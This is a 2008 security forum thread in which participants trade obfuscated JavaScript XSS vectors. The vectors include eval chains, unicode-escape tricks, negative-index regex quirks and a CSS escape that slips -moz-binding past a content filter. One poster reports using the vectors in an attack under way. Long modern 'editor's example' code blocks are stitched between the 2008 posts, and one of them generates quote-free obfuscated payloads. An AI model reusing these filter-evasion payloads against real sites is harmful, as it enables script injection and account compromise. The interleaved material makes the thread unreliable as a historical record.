Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: March 07, 2008 02:55AM

@Gareth: Hmm - I think you misunderstood me - please test both code snippets to know what I mean in this particular case :)

@asilvermtzion: Your nick seems to indicate excellent taste in music ;)



Edited 1 time(s). Last edit at 03/07/2008 02:57AM by .mario.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: March 07, 2008 04:47AM

@mario

Sorry mate I must have been tired last night :)
I've tested it and it appears that because there's no ";" in the second example it executes the alert statement without assigning it to "i". If you remove the first statement then the second doesn't execute because it has no reference to i.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: March 07, 2008 06:35AM

@asilvermtzion

Yeah, what fragge said. I was messing around with -2,-3,-4 etc., inspired by DoctorDan's regexp trick and John Resig's find on IE. Here's the code I created to find the properties:-

function inspectObject(obj) {
  var prop;
  var props = [];
  for(var i=-1000;i<1000;i++) {
    if(i > 0) {
      // positive side: probe single-character property names
      prop = obj[String.fromCharCode(i)];
      if(prop != null) {
        props.push(String.fromCharCode(i) + '=' + prop);
      }
    } else {
      // negative side: probe numeric indices (obj[i]; the forum's BBCode
      // parser swallowed the [i] in the original post)
      prop = obj[i];
      if(prop != null) {
        props.push(i + '=' + prop);
      }
    }
  }
  return props;
}
 
x=function x(){};
alert(inspectObject(x));




Edited 1 time(s). Last edit at 03/07/2008 06:36AM by Gareth Heyes.
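The brute-force sweep above, generalised as an added example (editor's code, not Gareth's): it first walks the prototype chain with Object.getOwnPropertyNames, which reports non-enumerable properties that a for-in loop never shows, and then runs the same negative-index and single-character sweep, flagging any key that yields a value without being declared anywhere on the chain. That is exactly the signature of an engine quirk like the old Firefox /re/[-1] behaviour, or of a Proxy. It assumes a current engine (Node.js), on which the sweep over a RegExp comes back empty; the Proxy in the usage shows what a hit looks like.

```javascript
// Added example (editor's code, not the post's): separate what the prototype
// chain declares from what a raw lookup returns anyway.
function declaredKeys(obj) {
  const keys = new Set();
  for (let o = obj; o !== null && o !== undefined; o = Object.getPrototypeOf(o)) {
    for (const k of Object.getOwnPropertyNames(o)) keys.add(k);  // includes non-enumerables
  }
  return keys;
}

// Sweep integer keys -range..range and single characters 0..range (the
// same keyspace as inspectObject) and report every key that yields a value
// without being declared anywhere on the chain: an engine quirk or a Proxy.
function probeObject(obj, range = 1000) {
  const declared = declaredKeys(obj);
  const exotic = [];
  const tryKey = (key) => {
    let value;
    try { value = obj[key]; } catch (e) { return; }  // a throwing getter is not a hit
    if (value !== undefined && value !== null && !declared.has(String(key))) {
      exotic.push(String(key));
    }
  };
  for (let i = -range; i <= range; i++) tryKey(i);
  for (let i = 0; i <= range; i++) tryKey(String.fromCharCode(i));
  return { declared: [...declared], exotic };
}

// Usage: probeObject(/x/g).exotic is [] on a current engine, while
// probeObject(new Proxy({}, { get: (t, k) => 'served ' + String(k) }), 3).exotic
// lists every probed key, because the proxy answers all of them.
```

The declared list is the one to read when you want the real property names (source, flags, lastIndex and friends on a RegExp); the exotic list is the one that would have caught the 2008 Firefox negative indices, and it is empty on any engine that follows the current spec.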

Re: New XSS vectors/Unusual Javascript
Posted by: asilvermtzion
Date: March 07, 2008 08:58AM

lol Mario :) It's quite unusual that people understand my nick

That's interesting Gareth, so in terms of compatibility I guess it's IE only?

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: March 07, 2008 09:53AM

@asilvermtzion

I've only tested it on Firefox but it could work on IE. As far as I know it doesn't work on Safari or Opera

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: March 10, 2008 04:08AM

javascript:{http://%0A(%46un%63\u0074ion%0C(('\u0061le%72t((1))'))%0A())()}


http://phpfi.com/301681

This one kind of messes up the BBCode parser... Just ignore the [ tags.]

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: March 10, 2008 04:26AM

And another one - playing with the negative indexes

try{c=/wtf/[-5]+'rt(/#/[-2])',a}catch(b){b.eval(c.replace(/[fs]/g,''))}

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: March 12, 2008 04:52AM

Just toying around...

with(URIError[-5-0e0])eval(/./.eval((false.toString()).replace(/[fs]/g,'')+'rt('+1e0+')'))

Re: New XSS vectors/Unusual Javascript
Posted by: asilvermtzion
Date: March 12, 2008 05:55PM

Slight rephrase of this question: say you had an object and wanted to access a property (index) without using square brackets, are there any elegant methods of access?



Edited 3 time(s). Last edit at 03/12/2008 06:34PM by asilvermtzion.

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: March 13, 2008 04:15AM

@asilvermtzion:

I dunno exactly what you mean - maybe it's related to this?

window['alert'](1)
window.alert(1)

var array = [1,2,3]
alert(array.pop(3))
for (i in array) alert(i)

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: March 13, 2008 04:36AM

alert(\u005b1,2,3,4,5\u005d)




Edited 1 time(s). Last edit at 03/13/2008 04:38AM by Gareth Heyes.

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: March 13, 2008 07:58AM

And of course
{µ=String.fromCharCode;eval('alert('+µ(91)+'1,2,3,4,5'+µ(93)+')')}

;)



Edited 1 time(s). Last edit at 03/13/2008 08:05AM by .mario.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: March 13, 2008 08:01AM

@mario

Hehe we could go on :) I think the point is that there's plenty of ways

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: March 13, 2008 08:05AM

We need a new challenge :)

Re: New XSS vectors/Unusual Javascript
Posted by: asilvermtzion
Date: March 13, 2008 08:12AM

This is the greatest thread known to man :) I've used at least four individual vectors in the current attack I'm working on!

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: March 13, 2008 08:18AM

@asilvermtzion

You obviously haven't seen this thread lol:-
http://sla.ckers.org/forum/read.php?11,1383

@mario

Yeah we need a new challenge....

Re: New XSS vectors/Unusual Javascript
Posted by: asilvermtzion
Date: March 13, 2008 09:28AM

can someone try obfuscating String.fromCharCode? Not having any luck with it



Edited 3 time(s). Last edit at 03/13/2008 09:34AM by asilvermtzion.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: March 13, 2008 10:40AM

Seeing as I had nothing else to do:-
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=YWxlcnQoPEB1bmlfMShcdSk%2BU3RyaW5nLmZyb21DaGFyQ29kZTxAL3VuaV8xPig8QHRvY2hhcmNvZGVzXzA%2BWFNTPEAvdG9jaGFyY29kZXNfMD4pKQphbGVydChldmFsKCc8QGhleF8yPlN0cmluZy5mcm9tQ2hhckNvZGUoPEB0b2NoYXJjb2Rlc18yPlhTUzxAL3RvY2hhcmNvZGVzXzI%2BKTxAL2hleF8yPicpKQ%3D%3D

You really need to learn how to use my tool Hackvertor if you're having trouble with obfuscation.

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: March 13, 2008 12:00PM

Or another quick and easy way to get an R

{a=(typeof (/./[-1])),b=a.replace(/s/,(a[0]).toUpperCase()),self['ev'+'al'](b+'.'+'fromµharµode'.replace(/µ/g,'C')+'(1e0*82)')}

Basically you can obfuscate anything in JS - especially when working with eval().
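The typeof trick in the post above, generalised into an added example (editor's code, not mario's and not Hackvertor output) that also answers the earlier request to obfuscate String.fromCharCode without quotes: every string the engine hands back for free (typeof results, coerced booleans and undefined, Object.prototype.toString output, the source text of a native function) is an alphabet that can be indexed without a single quote character. The helper builds that alphabet at run time, spells any target out of it, and reaches String.fromCharCode (and alert) by bracket lookup on globalThis, so neither a quote nor the identifier appears in the payload. globalThis stands in for self/window so the block runs under Node.js; in a browser they are the same object.

```javascript
// Added example (editor's code, not mario's or Hackvertor's): quote-free
// spelling of arbitrary strings from text the engine produces on its own.

// Each source is an expression with no quote or backtick that evaluates to
// a string. What it evaluates to is read back from the engine at build
// time instead of being hard-coded, so the table cannot silently drift.
const SOURCES = [
  '(!1+[])',                    // "false"
  '(!0+[])',                    // "true"
  '([][0]+[])',                 // "undefined"
  '({}+[])',                    // "[object Object]"
  '(1/0+[])',                   // "Infinity"
  '(+[][0]+[])',                // "NaN"
  '(.5+[])',                    // "0.5"            (supplies the dot)
  '(typeof 0)',                 // "number"
  '(typeof (!1+[]))',           // "string"         (mario's typeof trick)
  '(typeof [].map)',            // "function"
  '(Math+[])',                  // "[object Math]"  (supplies h and M)
  '(([]+[]).constructor+[])',   // "function String() { [native code] }"  (capital S)
  '(decodeURIComponent+[])',    // "function decodeURIComponent() ..."     (capital C, p)
];

function buildAlphabet() {
  const alphabet = new Map();
  for (const expr of SOURCES) {
    const text = String((0, eval)(expr));   // indirect eval: global scope, as a payload sees it
    for (let i = 0; i < text.length; i++) {
      if (!alphabet.has(text[i])) alphabet.set(text[i], `${expr}[${i}]`);
    }
  }
  return alphabet;
}
const ALPHABET = buildAlphabet();

// Expression that evaluates to `str` using only the alphabet above.
function quoteFree(str) {
  return [...str].map((ch) => {
    const piece = ALPHABET.get(ch);
    if (piece === undefined) throw new Error(`no quote-free source for ${JSON.stringify(ch)}`);
    return piece;
  }).join('+');
}

// globalThis[<"String">][<"fromCharCode">](c1,c2,...) with both names
// synthesised, so neither the identifier nor a quote is in the output.
function fromCharCodeExpr(codes) {
  return `globalThis[${quoteFree('String')}][${quoteFree('fromCharCode')}](${codes.join(',')})`;
}

// The usual alert(...) shape, as text, for a caller that has its own sink
// (eval, setTimeout, a javascript: URL).
function obfuscatedAlert(text) {
  const codes = [...text].map((c) => c.charCodeAt(0));
  return `globalThis[${quoteFree('alert')}](${fromCharCodeExpr(codes)})`;
}

// Usage: eval(fromCharCodeExpr([88, 83, 83])) === 'XSS', and the expression
// contains no quote, no backtick, no "String" and no "fromCharCode".
```

The point for a filter author is the same one the post makes: a blocklist of identifiers or quote characters is matching the wrong layer. Anything that can reach a sink such as eval only needs an alphabet, and the engine supplies one. Hex and octal escapes, String.prototype methods reached the same way, and the 2008 /re/[-1] trick are just alternative sources for the same table.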

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: March 13, 2008 12:39PM

@mario

Nice! :)

Re: New XSS vectors/Unusual Javascript
Posted by: asilvermtzion
Date: March 13, 2008 05:05PM

That's great, thanks btw Gareth - I've been using Hackvertor a fair bit. I had a slight problem here as I was unable to use any single/double quotes and there were some regex irregularities when you nest evals.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: March 13, 2008 05:20PM

@asilvermtzion

Cool, if you've found some problems please could you post to the thread and then I'll be happy to fix them. Preferably some example urls as well, please post to here:-
http://sla.ckers.org/forum/read.php?12,17908

Thanks!

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: March 26, 2008 06:53AM

JS Multiline fun:-

eval(\u002fale\
rt(1)/[-1].replace(/\\|\n/g,''));

eval("aler\
t(1)")

eval(\u0022aler\
t(1)")

eval(\u0027aler\
t(1)')

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: May 07, 2008 09:14PM

\u002f**/alert(1)\u002f**/

Re: New XSS vectors/Unusual Javascript
Posted by: DoctorDan
Date: May 08, 2008 06:24AM

Cool, Gareth! Why won't this work when you rearrange it: /**\u002falert(1)\u002f**/
It would be neat- would make the alert look like it's commented out.

-Dan

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: May 08, 2008 06:29AM

Inspired by Gareth's post:

find(function(){alert(1,find())}());

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: May 08, 2008 08:08AM

@Dan

The Javascript parsing engine (in FF at least) raises an error if the ending marker is not plain text :( This means that any comments, regular expressions or strings must end with a valid marker.

e.g.
--Valid--
\u0027test';
\u0022test";
\u002ftest/;
\u002f/test
\u002f**/alert(1)

--Invalid--
'test\u0027;
"test\u0022;
/test\u002f;
/\u002ftest
/**\u002falert(1)

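Gareth's valid/invalid lists describe Firefox as it was in 2008. The added probe below (editor's code, not from the post) compiles each form with new Function on whatever engine runs it, so the current rule can be checked rather than assumed: on every current engine a \uXXXX escape is honoured only inside an identifier or a string/template literal, never as a punctuator, so both of Gareth's lists fail to parse today, while an identifier spelled entirely in escapes still resolves to the same binding. It also explains what happens to Dan's rearranged form: /**\u002falert(1)\u002f**/ is a single block comment, so it parses and never runs the alert. Node.js (V8) is assumed only for the sample verdicts.

```javascript
// Added example (editor's code, not from the post): ask the engine that is
// running which \uXXXX forms it will parse, instead of trusting a list.
function parses(src) {
  try {
    new Function(src);           // compiles only; nothing in src is executed
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e;                      // anything else is a probe bug, not a verdict
  }
}

// The forms from the post plus Dan's rearrangement and two identifier
// escapes. Double backslashes keep the escape for the probed parser instead
// of letting this file's own parser consume it.
const FORMS = [
  // escape opens the token (listed as valid for 2008 Firefox)
  "\\u0027test';", '\\u0022test";', '\\u002ftest/;', '\\u002f/test', '\\u002f**/alert(1)',
  // escape closes the token (listed as invalid)
  "'test\\u0027;", '"test\\u0022;', '/test\\u002f;', '/\\u002ftest', '/**\\u002falert(1)',
  // DoctorDan's version: the scanner sees one block comment ending at the final */
  '/**\\u002falert(1)\\u002f**/',
  // escapes inside an identifier, which the grammar has always allowed
  '\\u0061lert(1)', 'al\\u0065rt(1)',
];

// Verdict per form for the engine this runs on.
function report() {
  const verdicts = {};
  for (const form of FORMS) verdicts[form] = parses(form);
  return verdicts;
}

// Spell an identifier entirely in \uXXXX escapes (a spelling that a filter
// matching the literal word never sees) ...
function escapeIdentifier(name) {
  return [...name].map((c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0')).join('');
}

// ... and confirm it still resolves to the same global binding.
function resolvesSameAs(name) {
  return new Function('return ' + escapeIdentifier(name))() === globalThis[name];
}

// Usage: report() maps each form to true/false; resolvesSameAs('Math') is true.
```

The practical consequence for a filter is the one the identifier cases show: a token filter has to decode identifier escapes before comparing, while the punctuator forms can simply be rejected as syntax errors on any engine that follows the current grammar.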
Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: May 09, 2008 02:39PM

I have not really read the 8 pages of this thread so I'm hoping this hasn't been posted, but what I recently stumbled upon while reading about the CSS syntax in the hope of making an exploit possible is the fact that in CSS a backslash followed by the hex number of a character is treated just like the real character.

That way I was able to bypass the content filter, and thus create the following vector:

<style> BODY{-moz\00002dbinding:url(URL)} </style>

This is also quite useful for bypassing blocked characters.
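Kyo's bypass works because the filter compares the raw text while the browser compares tokens: CSS tokenisation turns \00002d into "-" before the property name is ever looked at. The added decoder below (editor's code, not from the post) applies the CSS escape rule, a backslash followed by one to six hex digits plus one optional whitespace character that is swallowed denotes that code point, a backslash before a newline is a line continuation, and a backslash before anything else denotes that character itself, and then shows a check that decodes before it compares next to the substring check that the escape defeats. The blocked-property list is constructed for the example; -moz-binding is the property from the post.

```javascript
// Added example (editor's code, not Kyo's): decode CSS backslash escapes the
// way a CSS tokenizer does, then match property names on the decoded text.

// \ + 1..6 hex digits (+ one optional whitespace char, swallowed)  -> code point
// \ + newline                                                      -> nothing
// \ + anything else                                                -> that char
const CSS_ESCAPE = /\\(?:([0-9a-fA-F]{1,6})(?:\r\n|[ \t\n\f\r])?|(\r\n|[\n\f\r])|([\s\S]))/g;

function decodeCssEscapes(css) {
  return css.replace(CSS_ESCAPE, (match, hex, newline, literal) => {
    if (hex !== undefined) {
      const cp = parseInt(hex, 16);
      // NUL, surrogates and values past U+10FFFF become U+FFFD, as in CSS Syntax 3
      if (cp === 0 || cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff)) return '\ufffd';
      return String.fromCodePoint(cp);
    }
    if (newline !== undefined) return '';
    return literal;
  });
}

// Example blocklist (constructed for this example; -moz-binding is the
// property from the post). The check is made on decoded text.
const BLOCKED_PROPERTIES = ['-moz-binding', 'behavior'];

function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\\/-]/g, '\\$&');
}

// Decoded, case-folded match of "<name> :" in property position.
function findBlockedProperties(css, blocked = BLOCKED_PROPERTIES) {
  const decoded = decodeCssEscapes(css).toLowerCase();
  return blocked.filter((name) =>
    new RegExp('(^|[{;\\s])' + escapeRegExp(name) + '\\s*:').test(decoded));
}

// The substring check a 2008-era filter would have used, for contrast.
function naiveFindBlocked(css, blocked = BLOCKED_PROPERTIES) {
  const lower = css.toLowerCase();
  return blocked.filter((name) => lower.includes(name));
}

// Usage: for 'BODY{-moz\00002dbinding:url(URL)}' naiveFindBlocked() returns []
// and findBlockedProperties() returns ['-moz-binding'].
```

Two details of the rule matter to anyone writing or testing such a filter. The hex run is greedy up to six digits, so \2dbinding would decode as U+02DB followed by "inding"; that is why the post pads to six digits (\00002d) and why a single whitespace character after a short escape is consumed rather than emitted. And decoding is only the first layer: comments, which CSS strips, and the same escape inside a url() value are further places where the raw text and the token stream disagree.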

Re: New XSS vectors/Unusual Javascript
Posted by: DoctorDan
Date: May 13, 2008 08:44PM

with(this)watch('XSS',alert),XSS=false

and

this.watch('_',function(){return eval});
window.watch('a',function(a){return a+'lert'});
this._=window.a=null;
_(a)(1);

a+'lert'=='alert'? Sure!
-Dan



Edited 1 time(s). Last edit at 05/14/2008 06:23AM by DoctorDan.

Re: New XSS vectors/Unusual Javascript
Posted by: tx
Date: May 14, 2008 12:31AM

@DoctorDan: well that's plain fun. :)

-tx @ lowtech-labs.org
